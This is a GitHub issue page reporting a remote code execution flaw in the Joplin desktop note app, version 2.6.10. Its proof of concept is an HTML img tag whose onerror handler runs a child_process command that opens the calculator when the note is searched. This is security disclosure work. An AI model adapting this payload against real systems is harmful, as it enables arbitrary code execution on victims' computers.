-
-
Notifications
You must be signed in to change notification settings - Fork 5.6k
Closed
Labels
bugIt's a bugIt's a bugdesktopAll desktop platformsAll desktop platformshighHigh priority issuesHigh priority issuessecurity
Description
Jopin Remote Code Execution
Description
Joplin is powered by Eelectron. When the victim press Ctrl+P to search content, if the payload is near the content(before the content), we can remotely execute any JavaScript code on the victim's computer.
Affected versions of Joplin
Joplin version: Joplin 2.6.10
Platform: Windows
OS specifics: Windows 11
PoC
- Input the following text to anywhere the search engine of Joplin can search (if you use Linux/macOS, you can replace
calc.exeto corresponding command)
wh1sper
<img/src="1"/onerror=eval("require('child_process').exec('calc.exe');");>
- press
Ctrl+Pand inputwh1sper
Metadata
Metadata
Assignees
Labels
bugIt's a bugIt's a bugdesktopAll desktop platformsAll desktop platformshighHigh priority issuesHigh priority issuessecurity

